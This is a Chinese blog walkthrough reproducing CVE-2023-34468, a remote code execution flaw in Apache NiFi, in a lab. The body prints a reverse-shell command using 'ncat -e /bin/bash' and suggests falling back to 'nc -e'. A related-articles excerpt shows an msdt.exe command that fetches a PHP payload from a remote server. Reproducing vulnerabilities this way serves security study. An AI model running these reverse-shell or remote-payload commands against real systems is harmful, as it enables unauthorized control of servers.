CVE-2023-34468漏洞复现(Apache NiFi远程代码执行)

已于 2024-07-22 22:00:08 修改
阅读量391 收藏 5
点赞数 3
分类专栏: #软件安全 CVE 文章标签: apache
于 2024-07-22 21:27:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_77759960/article/details/140592827
版权

靶机要求

Apache NiFi 1.21.0(及其以下版本)
Java 17

NiFi简介及其基本操作

        今天来复现一下Apache NiFi的一个漏洞。首先,为了说明漏洞的原理和展示漏洞的复现过程,需要先介绍一下NiFi这款工具。

          NiFi是一个易于使用、功能强大而且可靠的数据处理和分发系统。我的理解是,它就像一个中介机构,收集一方发来的数据,判断符合安全要求后发送给另一方(可以是为两个不同的IP地址的计算机)。而这里的CVE-2023-34468漏洞,就是由于NiFi在中间“判断数据安全性”上没有完善而导致恶意代码向靶机植入,从而出现远程代码运行的漏洞。

        使用NiFi,最重要的是Processor,它可以看作运行不同代码的处理器,通过拖动左上角的插件进行添加。(例如我想从攻击机上上传一个含有恶意代码的SQL文件,那么需要使用ExecuteSQL的Processor,同时设置好上传的URL等)

POC

        具体操作步骤参考https://github.com/mbadanoiu/CVE-2023-34468/blob/main/Apache%20NiFi%20-%20CVE-2023-34468.pdf下面具体分析步骤中的一些关键部分。

入侵靶机

        这里攻击机对靶机的入侵是直接的。通过以下代码,靶机会在本机上运行目标地址上传的sql文件,此时,一旦上传的sql文件含有恶意代码,NiFi服务器将会作为靶机而遭到攻击。

ShellCode

这里核心的代码在变量command中,Shellcode通过运行

bash -c 'ncat -e /bin/bash 127.1 5555'

调用靶机的命令行向攻击机5555端口建立连接。建立连接后,即可以在攻击机上运行代码。

补充点

        首先因为代码中会构造一个函数 ShellExec(String) ,故当文件重复上传时,会提示函数已存在的错误。

其次,ncat -e 这个命令不一定在所有的电脑上都已经安装,如果没有预期结果,可以尝试将ShellCode中修改为 nc -e 命令。

最后,根据作者的方法,最后也有可能会在5555端口监听不到连接,可能是Shellcode并没有实际运行。

Mr.Jia
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache NiFi远程代码执行(CVE-2023-34468)
m0_65150886的博客
01-31 475
Apache NiFi
Apache NiFi远程代码执行-RCE
Birdman-one的博客
12-11 1624
Apache NiFi远程代码执行-RCE 简介: Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。 EXP:https://github.com/imjdl/Apache-NiFi-Api-RCE作者这里使用exp不行 使用方法:python exp.py [url] [反弹shell命令] MSF module: https://github.com/rapid7/metasp
apache nifi_apache nifi流指纹安全漏洞
weixin_26636643的博客
09-27 601
apache nifiIn this post, I will discuss a security vulnerability discovered in Apache NiFi flow fingerprints containing sensitive property descriptor values appearing in logs (CVE-2020–1942). During a...
Apache NiFi API RCE 复现
weixin_51345872的博客
09-01 2670
仅供学习参考使用,任何违法事情与本人无关。
【高危】Apache NiFi H2驱动存在代码注入漏洞
murphysec的博客
06-19 329
Apache NiFi 是一个开源的数据流处理和自动化工具,DBCPConnectionPool 和 HikariCPConnectionPool 是两个控制器服务,用于提供对数据库的连接池管理功能。Apache NiFi 受影响版本,由于 DBCPConnectionPool 和 HikariCPConnectionPool 控制器服务未对用户配置的 H2 驱动程序的 URL 字符串进行验证,经过身份验证的攻击者可构造包含恶意负载的 H2 JDBC URL,在目标服务器上执行恶意代码
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 ...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
Apache NiFi Jetty服务Sever信息泄露漏洞解决
蓝星极盾
11-03 1058
Apache NiFi Jetty服务Sever信息泄露,主要是404页面返回Jetty版本信息,以及Response头中返回Sever版本信息。 解决办法研究很久之后,发现其实很简单: 找到conf/nifi.properties配置文件,找到这部分, nifi.web.https.network.interface.default= nifi.web.jetty.working.directory=./work/jetty nifi.web.jetty.threads=200 nifi.web.
Apache NiFi API远程代码执行复现
锋刃科技的博客
12-07 2693
简介 一个易用、强大、可靠的数据处理与分发系统。基于Web图形界面,通过拖拽、连接、配置完成基于流程的编程,实现数据采集等功能 环境搭建 进入目录 cd nifi-1.12.1/bin/ ./nifi.sh 先执行一下试试,可以看到启动、停止、执行、重启、状态、dump、诊断、安装(为系统服务)、无状态 ./nifi.sh start 执行启动命令,删除了“java home”和“nifi home”,启动配置文件为“conf/bootstrap...
el7升级Apache模块编译
流金岁月的专栏
08-06 206
mod_wsgi mod_systemd mod_cgi
Apache Kafka 生产者 API 详解
Java领域优秀创作者
08-03 778
本文详细介绍了 Apache Kafka 生产者 API 的使用,包括配置、消息发送、错误处理和性能优化。通过理解和实践这些内容,可以帮助你更好地使用 Kafka 生产者进行高效、可靠的数据传输。希望本文对你有所帮助,如有任何疑问或建议,欢迎留言讨论。
Linux中apache服务安装与mysql安装
最新发布
qq_63994746的博客
08-06 143
准备环境:一台虚拟机、三个安装包(apr-1.6.2.tar.gz、apr-util-1.6.0.tar.gz、httpd-2.4.29.tar.bz2)安装环境:一台虚拟机、两个安装包(boost_1_59_0.tar.gz、mysql-5.7.17.tar.gz)
Apache OFBiz 曝出严重漏洞,允许预身份验证 RCE
FreeBuf_的博客
08-06 293
近日,研究人员发现 Apache OFBiz 中存在一个新的关键漏洞,该漏洞Apache OFBiz 中的一个错误授权问题,被追踪为CVE-2024-38856。SonicWall 的安全研究员 Hasib Vhora 与其他安全专家在公告中写道:如果满足某些先决条件,如屏幕定义没有明确检查用户的权限,因为它们依赖于终端的配置,那么未经验证的终端可能允许执行屏幕的屏幕渲染代码。该问题源于身份验证机制中的一个漏洞,它允许未经身份验证的用户访问通常仅限已登录用户使用的功能,从而可能导致远程代码执行
Apache Kylin 系列入门教程
qq_42072014的博客
08-06 616
通过以上步骤,你现在已经了解了如何安装、配置和使用Apache Kylin来构建数据仓库,并执行基本的查询操作。Apache Kylin非常适合处理大规模的数据集,并能够提供快速的查询响应。如果你需要进一步的功能或遇到任何问题,请查阅官方文档或寻求社区支持。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值